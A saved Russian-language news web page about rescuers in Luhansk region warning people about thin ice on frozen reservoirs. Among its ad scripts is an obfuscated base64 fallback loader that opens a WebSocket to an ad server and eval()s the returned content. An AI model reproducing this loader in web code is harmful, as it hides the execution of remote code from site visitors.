<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-1689781-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-1689781-1');
</script>

<meta charset="utf-8">
<title>Спасатели в Луганской области просят быть осторожными на замерзших водоемах &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Нынешние погодные условия в Луганской области, когда морозы сменяются оттепелью несколько раз в неделю, приводят к тому, что лед на реках и озерах нестабильный и хрупкий. Нынешние погодные условия в Луганской области, когда морозы сменяются оттепелью несколько раз в неделю, приводят к тому, что лед">
<meta name="keywords" content="Нынешние, неделю, крепость, погодные, сантиметров, хрупкий, озерах, реках, приводят, нестабильный, несколько, Луганской, сменяются, морозы, когда, области, оттепелью, условия, имейте, всегда">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Спасатели в Луганской области просят быть осторожными на замерзших водоемах">
<meta property="og:url" content="http://www.citynews.net.ua/news/88462-spasateli-v-luganskoj-oblasti-prosjat-byt-ostorozhnymi-na-zamerzshih-vodoemah.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2022-02/medium/1643714587_led.jpg">
<meta property="og:description" content="Нынешние погодные условия в Луганской области, когда морозы сменяются оттепелью несколько раз в неделю, приводят к тому, что лед на реках и озерах нестабильный и хрупкий. Поэтому спасатели Луганского областного ГСЧС еще раз напоминают основные правила безопасности на зимних водоемах. Помните, что">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/88462-spasateli-v-luganskoj-oblasti-prosjat-byt-ostorozhnymi-na-zamerzshih-vodoemah.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; Спасатели в Луганской области просят быть осторожными на замерзших водоемах</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>Спасатели в Луганской области просят быть осторожными на замерзших водоемах</h1>
<a href="http://www.citynews.net.ua/2022/02/01/" ><span class="date">Сегодня, 13:22</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,88462-spasateli-v-luganskoj-oblasti-prosjat-byt-ostorozhnymi-na-zamerzshih-vodoemah.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/88462-spasateli-v-luganskoj-oblasti-prosjat-byt-ostorozhnymi-na-zamerzshih-vodoemah.html" data-title="Спасатели в Луганской области просят быть осторожными на замерзших водоемах"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><img src="/uploads/posts/2022-02/medium/1643714587_led.jpg" alt="" style="display:block;margin-left:auto;margin-right:auto;">Нынешние погодные условия в Луганской области, когда морозы сменяются оттепелью несколько раз в неделю, приводят к тому, что лед на реках и озерах нестабильный и хрупкий.</p>
<p>Поэтому спасатели Луганского областного ГСЧС  еще раз напоминают основные правила безопасности на зимних водоемах.</p>
<p>Помните, что лед может быть непрочным у стока воды, вблизи кустов или камыша. Ни в коем случае не проверяйте его крепость ударом ноги.</p>
<p>Безопасным считается лед для одного пешехода толщиной не менее 7 сантиметров, для группы лиц – от 15 сантиметров. Рыбаки должны пробивать проруби на расстоянии не ближе, чем 5-6 метров друг от друга.</p>
<p>Не отправляйтесь на водоемы в одиночку и всегда имейте при себе длинную палку, чтобы проверять крепость льда.</p>
<p>Особое внимание уделяйте в этот период досугу детей. Не разрешайте им без сопровождения взрослых находиться у замерзших водоемов, тем более – играть на льду.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/news/69635-spasateli-prizyvayut-ukraincev-ne-vyhodit-na-tonkiy-led.html">Спасатели призывают украинцев не выходить на тонкий лед</a></li><li><a href="http://www.citynews.net.ua/ukrainenews/65457-za-nedelyu-na-vodoemah-ukrainy-pogibli-pochti-100-grazhdan.html">За неделю на водоемах Украины погибли почти 100 граждан</a></li><li><a href="http://www.citynews.net.ua/news/10036-v-luganskoy-oblasti-mchs-prosit-byt-vnimatelnee-na-ldu.html">В Луганской области МЧС просит быть внимательнее на льду</a></li><li><a href="http://www.citynews.net.ua/news/9633-v-luganskoy-oblasti-mchs-preduprezhdaet-ob-opasnosti-kreschenskih-kupaniy.html">В Луганской области МЧС предупреждает об опасности крещенских купаний</a></li><li><a href="http://www.citynews.net.ua/news/5677-upravlenie-po-voprosam-chs-luganskoj-oblgosadministracii-prizyvaet-ostorozhnee-vesti-sebya-na-ldu.html">Управление по вопросам ЧС Луганской облгосадминистрации призывает осторожнее вести себя на льду</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Сегодня, 14:55</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88463-rossijskie-boeviki-v-donecke-zastavljali-osuzhdennyh-vymanivat-dengi-pod-vidom-koll-centrov-otechestvennyh-bankov.html">Российские боевики в Донецке заставляли осужденных выманивать деньги под видом «колл-центров отечественных банков»</a></h4><span>Сегодня, 13:22</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88462-spasateli-v-luganskoj-oblasti-prosjat-byt-ostorozhnymi-na-zamerzshih-vodoemah.html">Спасатели в Луганской области просят быть осторожными на замерзших водоемах</a></h4><span>Сегодня, 13:15</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88461-ajeroport-borispol-ukrasjat-portretami-vydajuschihsja-zhenschin-uchenyh.html">Аэропорт «Борисполь» украсят портретами выдающихся женщин-ученых</a></h4><span>Сегодня, 11:04</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88460-v-luganskoj-oblasti-proveli-uchenija-po-takticheskoj-medicine-i-ajeromedicinskoj-jevakuacii-ranenyh.html">В Луганской области провели учения по тактической медицине и аэромедицинской эвакуации раненых</a></h4><span>Сегодня, 11:01</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88459-v-luganskoj-oblasti-za-sutki-756-novyh-sluchaev-covid-19.html">В Луганской области  за сутки 756 новых случаев COVID-19</a></h4><span>Вчера, 16:25</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88458-gbr-objavilo-podozrenie-nachalniku-gschs-v-luganskoj-oblasti-po-delu-o-lesnyh-pozharah-v-2020-godu.html">ГБР объявило подозрение начальнику ГСЧС в Луганской области по делу о лесных пожарах в 2020 году</a></h4><span>Вчера, 12:55</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88457-v-luganskoj-oblasti-na-vyhodnyh-spasateli-4-raza-okazali-pomosch-zastrjavshim-v-snegu-medikam.html">В Луганской области на выходных спасатели 4 раза оказали помощь застрявшим в снегу медикам</a></h4><span>Вчера, 10:21</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88456-v-luganskoj-oblasti-laboratorno-podtverzhdeno-130-novyh-sluchaev-covid-19.html">В Луганской области лабораторно подтверждено 130 новых случаев COVID-19</a></h4><span>Вчера, 10:07</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88455-v-luganskoj-oblasti-sbu-obnaruzhila-2-tajnika-boevikov-vblizi-linii-razgranichenija.html">В Луганской области СБУ обнаружила 2 тайника боевиков вблизи линии разграничения</a></h4><span>Вчера, 09:36</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88454-rossijskie-boeviki-obstreljali-stanicu-luganskuju-iz-granatometov.html">Российские боевики обстреляли Станицу Луганскую из гранатометов</a></h4><span>30-01-2022, 21:59</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88453-kak-v-luganske-i-donecke-poluchit-ukrainskij-nomer-telefona-dlja-gosuslug-.html">Как в Луганске и Донецке получить украинский номер телефона для госуслуг </a></h4><span>28-01-2022, 11:53</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88451-gschs-preduprezhdaet-ob-uhudshenii-pogody-v-luganskoj-oblasti-sneg-i-silnyj-veter.html">ГСЧС предупреждает об ухудшении погоды в Луганской области - снег и сильный ветер</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Сегодня, 13:15</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88461-ajeroport-borispol-ukrasjat-portretami-vydajuschihsja-zhenschin-uchenyh.html">Аэропорт «Борисполь» украсят портретами выдающихся женщин-ученых</a></h4><span>24-01-2022, 10:47</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88418-jak-znajti-robotu-v-yevrop.html">Як знайти роботу в Європі</a></h4><span>14-01-2022, 10:02</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88365-v-ukraine-vzlomany-ili-ne-rabotajut-sajty-neskolkih-ministerstv-i-dja.html">В Украине взломаны или не работают сайты нескольких министерств и Дія</a></h4><span>11-01-2022, 22:37</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88349-v-2021-godu-mezhdunarodnyj-ajeroport-kiev-imeni-sikorskogo-obsluzhil-1-418-153-passazhira.html">В 2021 году Международный аэропорт «Киев» имени Сикорского обслужил 1 418 153 пассажира</a></h4><span>11-01-2022, 18:27</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88348-v-kieve-zaminirovali-vse-shkoly.html">В Киеве «заминировали» все школы</a></h4><span>10-01-2022, 17:36</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88340-v-odesse-zaderzhali-rossijskogo-agenta-iz-pridnestrovja.html">В Одессе задержали российского агента из Приднестровья</a></h4><span>5-01-2022, 12:57</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88327-v-kieve-za-2021-god-zafiksirovano-25-temperaturnyh-rekordov.html">В Киеве за 2021 год зафиксировано 25 температурных рекордов</a></h4><span>29-12-2021, 16:48</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88305-pochemu-stoit-ehat-v-stolicu-dlja-poiska-raboty.html">Почему стоит ехать в столицу для поиска работы?</a></h4><span>16-12-2021, 16:21</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88246-ebrr-podtverdil-vydelenie-190-mln-evro-na-remont-avtodorogi-m-05-kiev-odessa.html">ЕБРР подтвердил выделение 190 млн евро на ремонт автодороги M-05 Киев – Одесса</a></h4><span>15-12-2021, 12:05</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88229-nadezhnost-avtomobilja-gaz-v-kachestve-avtozapchastej.html">Надежность автомобиля ГАЗ в качестве автозапчастей</a></h4><span>10-12-2021, 16:29</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88197-vysshij-antikorrupcionnyj-sud-napravil-zamestitelja-truhanova-v-sizo.html">Высший антикоррупционный суд направил заместителя Труханова в СИЗО</a></h4><span>7-12-2021, 12:21</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88174-pod-chernigovom-gruzovik-stolknulsja-s-marshrutkoj-13-pogibshih.html">Под Черниговом грузовик столкнулся с маршруткой - 13 погибших</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
				

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('01','2022','right'); return false;" href="http://www.citynews.net.ua/2022/01/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Февраль 2022&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="1">&nbsp;</td><td  class="day-active-v day-current" ><a class="day-active-v" href="http://www.citynews.net.ua/2022/02/01/" title="Все публикации за 01 февраля 2022">1</a></td><td  class="day" >2</td><td  class="day" >3</td><td  class="day" >4</td><td  class="weekday" >5</td><td  class="weekday" >6</td></tr><tr><td  class="day" >7</td><td  class="day" >8</td><td  class="day" >9</td><td  class="day" >10</td><td  class="day" >11</td><td  class="weekday" >12</td><td  class="weekday" >13</td></tr><tr><td  class="day" >14</td><td  class="day" >15</td><td  class="day" >16</td><td  class="day" >17</td><td  class="day" >18</td><td  class="weekday" >19</td><td  class="weekday" >20</td></tr><tr><td  class="day" >21</td><td  class="day" >22</td><td  class="day" >23</td><td  class="day" >24</td><td  class="day" >25</td><td  class="weekday" >26</td><td  class="weekday" >27</td></tr><tr><td  class="day" >28</td><td colspan="6">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2022 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
        <p>Материалы отмеченные рубрикой Пресс-релизы и Заметки публикуются на правах рекламы</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>Спасатели в Луганской области просят быть осторожными на замерзших водоемах &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Нынешние погодные условия в Луганской области, когда морозы сменяются оттепелью несколько раз в неделю, приводят к тому, что лед на реках и озерах нестабильный и хрупкий. Нынешние погодные условия в Луганской области, когда морозы сменяются оттепелью несколько раз в неделю, приводят к тому, что лед">
<meta name="keywords" content="Нынешние, неделю, крепость, погодные, сантиметров, хрупкий, озерах, реках, приводят, нестабильный, несколько, Луганской, сменяются, морозы, когда, области, оттепелью, условия, имейте, всегда">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Спасатели в Луганской области просят быть осторожными на замерзших водоемах">
<meta property="og:url" content="http://www.citynews.net.ua/news/88462-spasateli-v-luganskoj-oblasti-prosjat-byt-ostorozhnymi-na-zamerzshih-vodoemah.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2022-02/medium/1643714587_led.jpg">
<meta property="og:description" content="Нынешние погодные условия в Луганской области, когда морозы сменяются оттепелью несколько раз в неделю, приводят к тому, что лед на реках и озерах нестабильный и хрупкий. Поэтому спасатели Луганского областного ГСЧС еще раз напоминают основные правила безопасности на зимних водоемах. Помните, что">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/88462-spasateli-v-luganskoj-oblasti-prosjat-byt-ostorozhnymi-na-zamerzshih-vodoemah.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
